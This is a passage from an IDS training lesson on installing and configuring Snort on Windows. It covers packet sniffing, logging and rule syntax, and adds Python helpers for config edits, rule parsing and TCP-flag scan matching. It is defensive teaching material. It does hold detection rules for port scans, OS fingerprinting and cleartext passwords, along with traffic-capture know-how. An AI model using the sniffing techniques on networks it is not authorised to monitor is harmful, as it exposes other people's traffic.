9. Open My Computer, and navigate to the C:\Snort folder. Note the directory structure that was created during the install:
C:\Snort\bin
C:\Snort\contrib
C:\Snort\doc
C:\Snort\etc
C:\Snort\lib
C:\Snort\log
C:\Snort\rules
C:\Snort\schemas
10. In the C:\Snort\bin folder, create a folder named log (this will have a path of C:\Snort\bin\log).
11. In the C:\Snort\log folder (note this is not the folder created in Step 10), create a file named alert.ids and click Yes to accept that you are going to change the file name extension. You will need this file later in the lesson.
12. Choose Start > Administrative Tools > Services.
13. Scroll to the Messenger service.
14. Right-click the Messenger service and choose Properties.
15. Change the Startup type to Automatic.
It is a good idea for the students to save current versions of their snort.conf file during this lesson. If an error occurs, they only have to go back to the last known good file.
16. Click Apply.
17. Click Start.
18. Click OK.
19. Close the Services window.
Common Snort Commands
When running Snort, there are some common switches and commands you should
be aware of. In this course, you will not use all of these, but will use the most
common ones. These switches include:
-v: This is the basic command, putting Snort in packet sniffing mode.
-d: This is the command to display IP, TCP, ICMP, and UDP headers.
-e: This is the command to display the packet data along with the headers.
-l: This is the command to enable logging. After the -l command, you must define the location of the logs.
-c: This command is what essentially turns on the IDS functions of Snort, versus running it as a packet sniffer. After the -c command, you must define the location of the rules file that Snort is to use for IDS functions.
-W: This command will list the network interfaces that are available to Snort.
-iX: This command will tell Snort which network interface to use when you replace the X variable with the number of the network interface.
TASK 8B-2
Initial Snort Configuration
1. Open My Computer and navigate to the C:\Snort\etc folder.
2. Right-click the snort.conf le, and choose Copy.
3. Right-click in the C:\Snort\etc folder and choose Paste.
4. Rename the copy of the snort.conf file as snort.conf.bak. (Click Yes, if you receive a Rename warning prompt.) In the event that you run into difficulty with your snort.conf file, you will have this file as a backup.
5. Double-click the original snort.conf file.
6. Select the Select The Program From A List radio button and click OK.
7. Select WordPad as the program to use and click OK. You may leave the check box checked to always use this program to open this file type.
When editing Snort lines, be sure you edit the actual lines used, not the lines that are designated with a # comment.
8. Scroll down to var HOME_NET any and replace any with your home network.
If you are in the LEFT network, use: var HOME_NET 172.16.0.0/16
If you are in the RIGHT network, use: var HOME_NET 172.18.0.0/16
9. Search for the variable var EXTERNAL_NET any and change it to read var EXTERNAL_NET !$HOME_NET
10. Search for the line include classification.config and change it to read include C:\Snort\etc\classification.config
11. Search for the line include reference.config and change it to read include C:\Snort\etc\reference.config
12. Search for the variable var RULE_PATH ../rules and change it to read var RULE_PATH C:\Snort\rules
13. Change # include threshold.conf to read include C:\Snort\etc\threshold.conf
14. There are two other lines where you must replace the default line with a specific Windows path. The following two steps show the before and after of these two configuration lines.
15. Change dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/ to read dynamicpreprocessor directory C:\Snort\lib\snort_dynamicpreprocessor
16. Change dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine.so to read dynamicengine C:\Snort\lib\snort_dynamicengine\sf_engine.dll
17. Once you have made these changes, save and close the snort.conf le.
18. Open two command prompts. One will be used to run Snort and the other
to run ping commands.
19. At one of the command prompts, navigate to the C:\Snort\bin folder, and enter snort -W
You will see a list of available adapters on which you could install the sensor. The adapters are numbered 1, 2, 3, and so forth. In this lesson, you will be using the NIC. Write the number associated with that adapter here: _______
20. At the C:\Snort\bin prompt, enter snort -v -iX where X is the number
of the NIC that you recorded in the previous step.
21. Switch to your other open command prompt, and ping any other com-
puter in the network. When the ping is complete, switch back to the
command prompt that is running Snort.
22. In the Snort command prompt, press Ctrl+C to stop Snort.
23. Review the summary information, noting the packets that Snort cap-
tured in this test.
24. Close all open windows.
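The snort.conf edits from steps 8 through 16 of this task, applied by a script as an added example (not part of the course materials or of Snort). It assumes the default C:\Snort install path from the task, and it only rewrites a live line that exactly matches the Unix default shown in the steps, so commented lines stay untouched except for the threshold.conf include that step 13 uncomments. The excerpt below is a constructed fragment, not the real snort.conf.

```python
"""Apply the Windows path edits to a snort.conf and check that none were missed."""
import re

SNORT_DIR = r"C:\Snort"

# Constructed excerpt of a default snort.conf (real file is much longer).
SAMPLE_CONF = """\
# var HOME_NET 192.168.1.0/24
var HOME_NET any
var EXTERNAL_NET any
var RULE_PATH ../rules
dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/
dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine.so
include classification.config
include reference.config
# include threshold.conf
include $RULE_PATH/local.rules
"""

# (regex for the default live line, full replacement line) for steps 9 through 16.
# Whole-line replacement avoids re.sub's backslash handling in the Windows paths.
EDITS = [
    (r"^var EXTERNAL_NET any$", "var EXTERNAL_NET !$HOME_NET"),
    (r"^include classification\.config$", rf"include {SNORT_DIR}\etc\classification.config"),
    (r"^include reference\.config$", rf"include {SNORT_DIR}\etc\reference.config"),
    (r"^var RULE_PATH \.\./rules$", rf"var RULE_PATH {SNORT_DIR}\rules"),
    (r"^dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/$",
     rf"dynamicpreprocessor directory {SNORT_DIR}\lib\snort_dynamicpreprocessor"),
    (r"^dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine\.so$",
     rf"dynamicengine {SNORT_DIR}\lib\snort_dynamicengine\sf_engine.dll"),
]


def windowsize_snort_conf(text, home_net):
    """Return (edited text, [(old_line, new_line), ...]) after applying the task's edits."""
    out, changes = [], []
    for line in text.splitlines():
        stripped = line.strip()
        new = line
        if stripped == "var HOME_NET any":                   # step 8
            new = f"var HOME_NET {home_net}"
        elif stripped == "# include threshold.conf":         # step 13: uncomment, full path
            new = rf"include {SNORT_DIR}\etc\threshold.conf"
        elif not stripped.startswith("#"):                   # never touch other # comments
            for pattern, replacement in EDITS:
                if re.match(pattern, stripped):
                    new = replacement
                    break
        if new != line:
            changes.append((line, new))
        out.append(new)
    return "\n".join(out) + "\n", changes


def remaining_problems(text):
    """Live lines the task says must be changed that still carry their Unix default:
    HOME_NET any, the ../rules path, /usr/local paths, or a .config include without a path."""
    problems = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if "/usr/local/" in s or s in ("var HOME_NET any", "var RULE_PATH ../rules"):
            problems.append(s)
        elif s.startswith("include ") and s.endswith(".config") and "\\" not in s:
            problems.append(s)
    return problems


if __name__ == "__main__":
    edited, changes = windowsize_snort_conf(SAMPLE_CONF, "172.16.0.0/16")
    for old, new in changes:
        print(f"{old.strip()}\n    -> {new}")
    print("remaining problems:", remaining_problems(edited) or "none")
```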
Using Snort as a Packet Sniffer
In our rst example of working with Snort, you will use it for packet sniffng.
Using a command prompt, you will capture headers. This can produce a lot of
information quickly, so make sure that you change the buffer size of the com-
mand prompt to a very high value; even 5000 or more is ne. An example of
packet sniffing by Snort is shown in Figure 8-1.
Figure 8-1: An example of Snort being turned on as a packet sniffer.
About the Tasks
For many of the activities in this topic, you will work in pairs. Each student computer should have two command prompt windows open: one for running Snort commands and the other for running pings and other network commands. Your instructor will designate one student in each pair to act as Host One; the other will be Host Two. Remember which is which, and only perform those steps that apply to your specific machine.
packet sniffer: A device or program that monitors the data traveling between computers on a network.
TASK 8B-3
Capturing Packets with Snort
Setup: Snort has been installed and tested, and your instructor has
designated you as Host One or Host Two.
Note: Perform the following step on all student computers.
1. Open two command prompts.
Note: Perform the following step only if you are designated as Host One.
2. Change to the c:\snort\bin directory. Enter snort -v -ix (remember
to use the adapter number in place of the x). The -v switch prints the head-
ers on the screen.
Note: Perform the following step only if you are designated as Host Two.
3. As soon as Host One has pressed Enter, ping Host One by its IP address.
Note: Perform the following step only if you are designated as Host One.
4. As soon as the ping is completed, press Ctrl+C to stop the packet capture.
Leave the used windows open, and switch to the unused command
prompt.
Note: Perform the following step only if you are designated as Host Two.
5. Switch to the unused command prompt. Change to the c:\snort\bin
directory. Enter snort -v -ix (remember to use the adapter number in
place of the x).
Note: Perform the following step only if you are designated as Host One.
6. As soon as Host Two has pressed Enter, ping Host Two by its IP
address.
Note: Perform the following step only if you are designated as Host Two.
7. As soon as the ping is completed, press Ctrl+C to stop the packet capture.
Note: Perform the following step on all student computers.
8. Minimize the command prompt window used for pinging, and focus on the window in which Snort was running. Browse the file, and try to identify the ping packets sent between Host One and Host Two.
Packet Data Capture
When Snort is first stopped, it lists some statistics about the capturing session that just ended. This statistical summary gives a quick overview of the kinds of traffic that were captured, and it looks like Figure 8-2.
Lesson 8: Configuring an IDS 411
Figure 8-2: An example of the statistics after a packet capture has completed.
In this example, no packets were dropped, and the vast majority of packets cap-
tured were TCP. This screenshot was generated on a Windows 2000 computer,
after running for about 20 seconds in a controlled environment.
Figure 8-3 shows a portion of the packet headers that were captured, specifically the ping packets. This was the goal of the previous exercise: to identify the ping packets. From this screenshot, you can identify that the ping was initiated from host 10.0.10.115 and was sent to 10.0.10.213.
You should be able to see that the packets were correctly identified as ICMP, and the ID numbers are going up as expected: 2635 on the first request shown, 2636 on the second, and so on. The reply packets also follow the ICMP rules: ID 53820 followed by 53821. The sequence numbers are also correct, again incrementing by one, as expected.
Figure 8-3: An example of a ping sequence between two hosts captured by Snort.
Although the capture of header information is an excellent way to craft the IDS
for an organization, more might be required, such as examining the contents of
packets and determining if the content matches any rule. If this is the case, then
another switch is needed to see the packet data in Snort. The switch to add is the
-d switch.
TASK 8B-4
Capturing Packet Data with Snort
Note: Perform the following step only if you are designated as Host One.
1. If necessary, change to the directory where you installed Snort. Remem-
ber, the directory is c:\snort\bin. Enter snort -ix -v -d.
Using the -d switch enables you to see the packet data in Snort.
Note: Perform the following step only if you are designated as Host Two.
2. As soon as Host One has pressed Enter, ping Host One by its IP address.
Note: Perform the following step only if you are designated as Host One.
3. As soon as the ping is completed, press Ctrl+C to stop the packet capture.
Leave this window open, and switch to the other command prompt.
Note: Perform the following step only if you are designated as Host Two.
4. Switch to the other command prompt. If necessary, change to the direc-
tory where you installed Snort. Enter snort -ix -v -d.
Don't forget, the x in the switch -ix is the number of your network interface.
Note: Perform the following step only if you are designated as Host One.
5. As soon as Host Two has pressed Enter, ping Host Two by its IP
address.
Note: Perform the following step only if you are designated as Host Two.
6. As soon as the ping is completed, press Ctrl+C to stop the packet capture.
Note: Perform the following step on all student computers.
7. Minimize the command prompt that you used for pinging, and focus on the window in which Snort was running. Browse the file, and try to identify the ping packets sent between Host One and Host Two. Because the contents of the packet are captured this time, the screen looks different.
You should still be able to identify the ping sequence, though. The difference that should be obvious is the payload data itself. Because the data is a ping, the payload is filled with padding: in this case, letters from the English alphabet.
In both command prompt windows, use the cls command to clear the screen and prepare for the next task.
Logging with Snort
Using packet capture enables the security professional to gather data to look for
misuse of resources and network intrusions. However, it is impractical to expect
anyone to watch the screen for intrusions, not to mention that the speed at which
the packets are captured is quite fast (as you might have already seen).
It is much more logical to record these packets to the hard drive for future analysis. The process is pretty simple: provide a log directory and tell Snort to perform logging. If you start the Snort program, telling it to log, and there is no such directory, Snort will exit with an error.
Snort is designed to create a folder hierarchy of the packets it captures. The
folder structure in the log directory uses IP addresses for simple searching at a
later time.
TASK 8B-5
Logging with Snort
Setup: Two clean command prompt windows are open.
Note: Perform the following step only if you are designated as Host One.
1. If necessary, change to the directory where you installed Snort. Enter
snort -ix -dev -l \snort\log to start Snort and instruct it to
record headers and data in the \snort\log folder.
Note: Perform the following step only if you are designated as Host Two.
2. Ping Host One by its IP address.
Note: Perform the following step only if you are designated as Host One.
3. Switch to the other prompt, and ping Host Two by its IP address.
Note: Perform the following step only if you are designated as Host Two.
4. Change to the directory where you installed Snort, and enter snort
-ix -dev -l \snort\log to start Snort and instruct it to record
headers and data in the \snort\log folder.
Note: Perform the following step only if you are designated as Host One.
5. Ping Host Two by its IP address.
Note: Perform the following step only if you are designated as Host Two.
6. Ping Host One by its IP address.
Note: Perform the rest of this task on all student computers.
7. Press Ctrl+C to stop Snort.
8. Start Windows Explorer, and navigate to the snort\log folder.
9. Locate your log file; it will have a name such as snort.log.116850130.
10. Choose Start > All Programs > Wireshark > Wireshark.
11. Choose File > Open.
12. Navigate to your new log le and click Open.
13. Review the packet capture, and compare what was captured with the
ping commands you sent between you and your partner.
14. Close all windows.
Topic 8C
Snort as an IDS
Up to this point, you have been using Snort to capture packets and then examin-
ing the contents of those packets. Although this can be quite useful, it is not a
practical way to deploy an IDS. An IDS needs rules to follow and a way to alert
the administrator when a rule is matched. In this topic, you will take Snort to the
next level: IDS.
It's All in the Rules
As stated earlier, Snort uses rules to match signatures of misuse. These rules can be created from scratch, or the rules that come with the application can be modified for use. You will look at both scenarios.
An example of the syntax to use Snort as an IDS is as follows:
%systemroot%\snort\snort -dev -l \snort\log -c snort.conf
In this example, the new addition to the line is the -c switch, followed by the snort.conf file. As you might remember, the snort.conf file is used to define configuration variables that will be used by Snort. Earlier, all that the snort.conf file was used for was to specify the Home_Net variable by changing it to refer to the correct IP address.
In this case, adding the -c switch tells Snort to apply the rules that are in the snort.conf file to the packets as they are processed by Snort. Before we get too far ahead of ourselves, let's back up and look at the basics of the Snort rules. The rules of Snort are made up of two distinct parts:
Rule Header: The Rule Header is where the rule's action, protocol, directional operator, source and destination IP addresses (with subnet mask), and the source and destination ports are identified.
Rule Options: The Rule Options are where the rule's alert messages and specifications of what parts of the packet are to be matched to determine if there is a rule match.
Here is an example rule:
alert tcp any any -> any 80 (content: "adult"; msg: "Adult Site Access";)
The syntax breakdown of this example is as follows:
The text up to the first parenthesis is the Rule Header.
The section enclosed inside the parentheses is the Rule Options. Rule Options are not required by any rule, but they provide much information and might be the reason for creating the rule itself.
So, the end result of this rule is to create an alert if TCP traffic from any IP address and any port is sent to any host at port 80, where the word "adult" is in the payload. If this rule is matched, a message of Adult Site Access will be placed in the logs with this packet.
The Rule Header
Let's look at the Rule Header in more detail. As mentioned previously, the Rule Header for our example is composed of the following information:
alert tcp any any -> any 80
The first part of this syntax, alert, is known as a rule action. The rule action in the header defines what is to be done when a packet that matches the rule is found. There are five actions that can be defined.
Rule Action   Description
Alert         Creates an alert using whatever method has been defined. Also logs the packet using whatever method has been defined.
Log           Logs the packet using whatever method has been defined.
Pass          Tells Snort to ignore this packet.
Activate      Creates an alert and turns on a dynamic rule.
Dynamic       Remains unused unless another rule calls it. If called, it acts similarly to a log rule.
The symbol represents that all code shown belongs on the same line. It is shown here on more than one line due to margin constraints.
After the action has been defined, the next step is to define the protocol. In our example, the protocol defined is TCP. Currently, Snort supports defining the TCP, UDP, ICMP, and IP protocols.
After the action and protocol are defined, Snort requires the IP addresses to be used. A valid statement is to use the word any, meaning any IP address. Snort uses the CIDR netmask format for specifying the subnet mask. Following this, a full Class A IP address will have a netmask of /8, a full Class B will have a netmask of /16, and a full Class C will have a netmask of /24. Single hosts might be specified with a /32 netmask.
In addition to defining a single host or a single subnet of addresses, Snort can work with groups of IP addresses in a single rule. This is called creating an IP list. The IP list can be created by enclosing the list, with addresses separated by commas, in square brackets. An example of using an IP list is:
alert tcp any any -> [10.0.10.0/24, 10.10.10.0/24] any (content: "Password"; msg:"Password Transfer Possible!";)
Note: Although the book prints this rule on two lines, in the editor it can be entered as a single long line. Versions of Snort before 1.8 required a backslash (\) between lines of a single rule. It is acceptable now to have a rule span multiple lines, but in most editors, a long line is easy to work with.
After IP addresses have been specified, you need to tell Snort which port you want to check. When you are working with Snort rule syntax, ports can be defined in several ways. Single static ports are common, as in port 80, port 23, and so on. The rule can also use the keyword any, again meaning any port. Ranges of ports can also be defined using a colon to separate the start and end points of the range. Here are several examples of different port definitions:
To log any traffic from any IP address and any port to port 23 of the 10.0.10.0/24 network:
log tcp any any -> 10.0.10.0/24 23
To log any traffic from any IP address to any port between (and including) 1 and 1024 on any host in the 10.0.10.0/24 network:
log tcp any any -> 10.0.10.0/24 1:1024
To log any traffic from any IP address where the source port number is less than or equal to 1024 and is destined for any host in the 10.0.10.0/24 network with a destination port greater than or equal to 1024:
log tcp any :1024 -> 10.0.10.0/24 1024:
In the rules of Snort, there is an option to negate a port or IP address. By using
the exclamation point (!), the rule will perform a negate. This is similar to the
negate option in the IPTables rulesets. For example:
To log any tcp traffic from any host other than 172.16.40.50 using any port
to any host on the 10.0.10.0/24 network using any port:
log tcp !172.16.40.50/32 any -> 10.0.10.0/24 any
To log any tcp traffic from any host using any port to the 10.0.10.0/24 net-
work to any port other than 23:
log tcp any any -> 10.0.10.0/24 !23
By now, through these examples, you should be able to identify the directional option. The direction is defined with ->. This means coming from the left and going to the right, so to speak. It is possible to have Snort check the packet for IP addresses and ports in both directions. This can be a benefit for analysis of both sides of a session. The following example uses the bi-directional option to record both ends of a telnet session:
log tcp 10.0.10.0/24 any <> 172.16.30.0/24 23
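To make the header syntax concrete, here is an added example (not from the book and not Snort's own parser) that splits a rule into its Rule Header and Rule Options and checks a packet against the header, handling any, CIDR blocks, bracketed IP lists, port ranges, ! negation and the -> and <> directions. It assumes a packet is a plain dict of protocol, addresses and ports, with the ports set to None for ICMP.

```python
"""Parse a Snort rule into Rule Header and Rule Options and evaluate the
header against a packet.  Added example: a simplified re-implementation of
the header syntax described above, not Snort's own parser."""
import ipaddress
import re

RULE_ACTIONS = ("alert", "log", "pass", "activate", "dynamic")
PROTOCOLS = ("tcp", "udp", "icmp", "ip")


def split_rule(line):
    """Return (header, options).  Options are everything inside the outer
    parentheses and are not required, so a header-only rule is valid."""
    line = line.strip()
    if "(" not in line:
        return line, ""
    header, _, rest = line.partition("(")
    return header.strip(), rest.rsplit(")", 1)[0].strip()


def parse_options(options):
    """'content: "x"; msg:"y"; nocase;' -> [('content','x'), ('msg','y'), ('nocase',None)].
    Options are separated by ';', a keyword from its argument by ':'.  Order is
    kept because content modifiers apply to the content that precedes them."""
    parsed = []
    for item in options.split(";"):
        item = item.strip()
        if item:
            keyword, sep, value = item.partition(":")
            parsed.append((keyword.strip(), value.strip().strip('"') if sep else None))
    return parsed


def parse_header(header):
    """'alert tcp any any -> [10.0.10.0/24, 10.10.10.0/24] any' -> dict of fields."""
    header = re.sub(r"!\s+", "!", header)          # '! 1.2.3.4' -> '!1.2.3.4'
    header = re.sub(r"\[[^\]]*\]", lambda m: m.group(0).replace(" ", ""), header)
    parts = header.split()
    if len(parts) != 7:
        raise ValueError("expected action proto src sport dir dst dport: %r" % header)
    action, proto, src, sport, direction, dst, dport = parts
    if action.lower() not in RULE_ACTIONS or proto.lower() not in PROTOCOLS:
        raise ValueError("unknown action or protocol in %r" % header)
    if direction not in ("->", "<>"):
        raise ValueError("direction must be -> or <>, got %r" % direction)
    return {"action": action.lower(), "proto": proto.lower(), "src": src,
            "sport": sport, "direction": direction, "dst": dst, "dport": dport}


def parse_rule(line):
    header, options = split_rule(line)
    rule = parse_header(header)
    rule["options"] = parse_options(options)
    return rule


def port_matches(spec, port):
    """spec: 'any', '23', '1:1024', ':1024', '1024:', optionally prefixed '!'.
    ICMP carries no ports (port is None), which is why such rules use 'any'."""
    if spec.startswith("!"):
        return not port_matches(spec[1:], port)
    if spec == "any":
        return True
    if port is None:
        return False
    if ":" in spec:
        low, high = spec.split(":", 1)
        return (int(low) if low else 0) <= port <= (int(high) if high else 65535)
    return port == int(spec)


def ip_matches(spec, ip):
    """spec: 'any', host or CIDR ('10.0.10.0/24', '172.16.40.50/32'; a bare
    host means /32), a bracketed IP list, optionally prefixed '!'."""
    if spec.startswith("!"):
        return not ip_matches(spec[1:], ip)
    if spec == "any":
        return True
    if spec.startswith("[") and spec.endswith("]"):
        return any(ip_matches(s, ip) for s in spec[1:-1].split(","))
    return ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)


def header_matches(rule, pkt):
    """pkt: dict with proto, src, sport, dst, dport (ports None for ICMP).
    '->' checks left-to-right only; '<>' also accepts the reverse direction,
    which is how both ends of a session are captured."""
    if rule["proto"] != "ip" and rule["proto"] != pkt["proto"]:
        return False

    def one_way(a_ip, a_port, b_ip, b_port):
        return (ip_matches(rule["src"], a_ip) and port_matches(rule["sport"], a_port)
                and ip_matches(rule["dst"], b_ip) and port_matches(rule["dport"], b_port))

    if one_way(pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"]):
        return True
    return rule["direction"] == "<>" and one_way(pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"])
```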
The Rule Options
Where Snort can really start to show its flexibility and function is in the Rule Options. All of the Rule Options are separated by using a semicolon (;). Rule Option keywords are separated from their arguments with a colon (:). The following table lists some of the available keywords.
Keyword   Description
msg       Prints a message, as defined, in the alert and packet logs.
ttl       Used to match the IP header's Time To Live value.
id        Used to match a specific IP header fragment ID value.
flags     Used to match TCP flags for defined values.
ack       Used to match the TCP ack setting for a defined value.
content   Used to match a defined value in a packet's payload.
There are more keywords. It is advisable that you check the man pages (if you
are using a Linux box) or the Help pages (if you are using a Windows box) for
the remaining list of keywords.
When the msg option is used in a rule, it tells the logging and alerting engine
that there is a message that should be inserted along with a packet dump or in an
alert. Here is a sample syntax for the msg option:
msg: "text here";
When the ttl option is used in a rule, it tells Snort that there is a specific Time To Live value to match. Only successful on an exact match, this can be useful for detecting traceroute attempts. Here is a sample syntax for the ttl option:
ttl: "time-value";
When the id option is used in a rule, it tells Snort to match an exact value in the IP header Fragment ID field. Here is a sample syntax for the id option:
id: "id-value";
For the flags option, there are several suboptions, which include the flags that can be matched. The flags are defined in the rule by their single letter, as listed here:
F for FIN
S for SYN
R for RST
P for PSH
A for ACK
U for URG
2 for Reserved bit 2
1 for Reserved bit 1
0 for no TCP flags set
The standard logical operators are also valid for flags: the + for matching all of the defined flags, the * for matching any of the defined flags, and the ! for matching all except the defined flags. The reserved bits can be used to detect scans or IP stack fingerprinting. Here is a sample syntax for the flags option:
flags: value(s);
The following rule example shows a syntax that could be used to detect SYN-FIN scans:
alert tcp any any -> 10.0.10.0/24 any (flags: SF; msg: "SYN FIN Scan Possible";)
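As an added example (not the book's or Snort's code), the following implements the flags matching described here, including the +, * and ! modifiers, and runs this lesson's three scan rules against a TCP flags byte. The bit values are assumed from the TCP header flags byte, with Snort's 1 and 2 taken as the two bits above URG.

```python
"""Evaluate the Snort 'flags' option against the TCP flags byte, with the
'+', '*' and '!' modifiers and the reserved-bit letters used for scan and
OS-fingerprinting rules.  Added example, not Snort's own code."""

# Flag letter -> bit in the TCP flags byte (assumed layout: FIN is the lowest
# bit, URG is 0x20).  Snort's '1' is the most significant reserved bit and
# '2' the one below it; today these carry CWR and ECE.
FLAG_BITS = {"F": 0x01, "S": 0x02, "R": 0x04, "P": 0x08,
             "A": 0x10, "U": 0x20, "2": 0x40, "1": 0x80}


def parse_flags_option(spec):
    """'SF' -> ('exact', 0x03); '+SA' -> ('+', 0x12); '0' -> ('exact', 0)."""
    spec = spec.strip()
    mode = "exact"
    if spec and spec[0] in "+*!":
        mode, spec = spec[0], spec[1:]
    if spec == "0":                     # no TCP flags set at all
        return mode, 0
    bits = 0
    for letter in spec:
        if letter not in FLAG_BITS:
            raise ValueError("unknown flag letter %r" % letter)
        bits |= FLAG_BITS[letter]
    return mode, bits


def flags_match(spec, tcp_flags):
    """True if a packet's flags byte satisfies the option.
    exact: the set flags are exactly the listed ones (SF = SYN+FIN only)
    +    : all listed flags are set, others may be set too
    *    : any one of the listed flags is set
    !    : none of the listed flags is set"""
    mode, wanted = parse_flags_option(spec)
    if mode == "exact":
        return tcp_flags == wanted
    if mode == "+":
        return (tcp_flags & wanted) == wanted
    if mode == "*":
        return (tcp_flags & wanted) != 0
    return (tcp_flags & wanted) == 0


# The scan-detection rules of this lesson, reduced to their flags option
# and alert message.
SCAN_RULES = [
    ("SF", "SYN-FIN scan detected"),
    ("0", "NULL scan detected"),
    ("S12", "O/S Fingerprint detected"),
]


def detect_scans(tcp_flags):
    """Return the messages of every scan rule whose flags option matches."""
    return [msg for spec, msg in SCAN_RULES if flags_match(spec, tcp_flags)]
```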
When the ack option is used in a rule, it tells Snort to match a specific ACK value in the TCP header of a packet. The network mapping tool Nmap uses the ACK flag to determine if a remote host is active. Here is a sample syntax for the ack option:
ack: "ack-value";
The content keyword might be the most important keyword that Snort has
available. When you use this option in a rule, it enables Snort to examine the
payload of a packet and perform checks against the contents based on this
keyword. Snort uses a pattern-match function called Boyer-Moore. (This match-
ing function can be more intense than all the other options, so take care not to
overuse this option on slower machines.) This rule is case-sensitive, so matching
the word Test and the word test are two different things.
The complexity of this option comes into play with the definition of the data for the match. Although it can be entered in plaintext, it can also be entered as mixed text and binary bytecode. (Bytecode data is a hexadecimal representation of binary data.) The basic syntax of this option is similar to the other options:
content:"content value";
Simple Rule Examples
This section details several rule examples, followed by brief descriptions of their
functions. You can use these as a template for creating your own simple rules.
To log all traffic trying to connect to the telnet port:
log tcp any any -> 10.0.10.0/24 23
To log ICMP traffic towards the 10.0.10.0 network:
log icmp any any -> 10.0.10.0/24 any
To allow all web browsing to go through without logging:
pass tcp any any -> any 80
To create an alert with a message:
alert tcp any any -> any 23 (msg: "Telnet Connection Attempt";)
To find SYN/FIN scans of the network:
alert tcp any any -> 10.0.10.0/24 any (msg: "SYN-FIN scan detected"; flags: SF;)
To find TCP NULL scans of the network:
alert tcp any any -> 10.0.10.0/24 any (msg: "NULL scan detected"; flags: 0;)
To find attempts at OS fingerprinting:
alert tcp any any -> 10.0.10.0/24 any (msg: "O/S Fingerprint detected"; flags: S12;)
To perform content filtering:
alert tcp $HOME_NET any -> !$HOME_NET any (content: "Hello"; msg:"Hello Packet";)
Now that you have looked at several example rules, let's put them together and create a ruleset for Snort.
Snort Rule IDs
An option was added to Snort to categorize all the various Snort rules. This gives people everywhere the ability to use the same numbering scheme for their rules, and it helps keep the rules organized. There are a few ranges of the Snort ID (SID) that you need to be aware of. These ranges are:
Less than 100: Reserved for future Snort use.
101 through 1,000,000: Reserved for direct Snort.org distribution rules.
1,000,001 and greater: These numbers are for the custom local rules.
A great resource called www.bleedingsnort.com uses rules in the 2,000,000
range. When you develop your own local rules, as long as you use a unique num-
ber for every rule, and that number is greater than one million, your rule will not
have a SID problem. However, it is a good idea to use a higher number such as
four million and up, because organizations who write rules, such as Bleeding
Snort, might be in the lower ranges.
Even when using ICMP, Snort requires ports to be defined, so use the word any.
The content filtering example uses the Home_Net variable instead of defining the IP address.
TASK 8C-1
Creating a Simple Ruleset
Objective: To create a rule that logs all TCP traffic, alerts to ping, and
alerts to the use of the word password.
1. Open Notepad and enter the following:
log tcp any any <> any any (msg: "TCP Traffic Logged"; sid:10000001;)
alert icmp any any <> any any (msg: "ICMP Traffic Alerted"; sid: 10000002;)
alert tcp any any <> any any (content: "password"; msg: "Possible Password Transmitted"; sid:10000003;)
2. Save the file as "C:\Snort\rules\myrule.rules" and close Notepad. Be sure to type the quotes so that Windows will not assign a file name extension, keeping .rules as the extension.
Testing a Rule Set
After you have created a ruleset and have saved it in the Snort folder, it is time
to test this ruleset. You can do so at the command prompt. Just be sure that the
command prompt buffer is set high enough.
TASK 8C-2
Testing the Ruleset
Note: Perform the following step on all student computers.
1. Clear the \snort\log folder and open two command prompts. If you want
to save the old logs to another location, go ahead and do so.
Note: Perform the following step only if you are designated as Host One.
2. If necessary, change to the directory where you installed Snort. Enter snort -d -e -v -iX -c \Snort\rules\myrule.rules -l \Snort\log to run Snort using the new ruleset.
Note: Perform the following step only if you are designated as Host Two.
3. Once Host One is running Snort, ping Host One by its IP address. Then, enter net send [ip_address] Here is my password
In this case, [ip_address] is the IP address of your partner's computer.
Note: Perform the following step only if you are designated as Host One.
4. When you receive the message, click OK, and then stop Snort by pressing
Ctrl+C.
Due to space constraints, code appearing with the continuation character at the end of the line should appear on one line in Notepad.
Note: Perform the following step only if you are designated as Host Two.
5. If necessary, change to the directory where you installed Snort. Enter snort -d -e -v -iX -c \Snort\rules\myrule.rules -l \Snort\log to run Snort using the new ruleset.
Note: Perform the following step only if you are designated as Host One.
6. Once Host Two is running Snort, ping Host Two by its IP address. Then, enter net send [ip_address] Here is my password
In this case, [ip_address] is the IP address of your partner's computer.
Note: Perform the following step only if you are designated as Host Two.
7. When you receive the message, click OK, and stop Snort by pressing
Ctrl+C.
Note: Perform the following step on all student computers.
8. Examine the log files for the alerts and logs that were generated. Compare them to the ruleset and your scan from earlier. Then, close all open windows.
9. To look at the alert data that was generated, right-click the alert.ids file, open it with WordPad, and examine the alert.
More Rule Options
Up to this point, you have seen very simple rules, and while these are good for getting used to Snort, the example rules so far have been very limited. Snort can work with much more complex rulesets, and as you will see in the following section, the only limitation is your imagination and knowledge of your environment.
As discussed, the Snort rule is broken into two primary parts, the header and the options. Where the header details the IP, port number, direction, and so on, the options are where you can get very specific with the rule. There are many choices of what you can place in the options part of the rule, and for the context of this lesson, you will examine two of them: Metadata Options and Payload Detection Options.
Metadata Options
Metadata Options are where you detail characteristics about the rule. One example of a Metadata Option is the Message (msg), which you looked at previously in this lesson. Another example is the Snort Rule ID (sid). You could also define a reference URL for more information about the event. Here is a quick list of Metadata Options:
msg: This option is used to insert a message in human-readable language.
sid: This option is used to define the unique Snort Rule ID for the specific rule.
classtype: This option is used to classify the specific type of event.
priority: This option is used to define the priority level of the event.
reference: This option is used to define a reference URL for more information about the event.
rev: This option is used to define a revision number for the rule.
Classtypes
Classtype and priority level can go together, with the classification of an event being tied to a priority level. There are three default levels of priority (low, medium, and high), but you are able to define these further using the priority: option in your rule. The default priorities have a numeric value of 1 (high), 2 (medium), and 3 (low).
The Classtype is used to categorize events. There are many preconfigured classtypes, and these are assigned to one of the three default priority levels. The following table details some of the default classtypes.
Classtype                        Description                                              Priority
Attempted-admin                  Attempted administrator privilege gain.                  High
Attempted-user                   Attempted user privilege gain.                           High
Shellcode-detect                 Executable code was detected.                            High
Successful-admin                 Successful administrator privilege gain.                 High
Trojan-activity                  A network Trojan was detected.                           High
Web-application-attack           Web application attack.                                  High
Attempted-recon                  Attempted information leak.                              Medium
Suspicious-login                 An attempted login using a suspicious user name detected. Medium
Successful-dos                   Denial-of-service attack.                                Medium
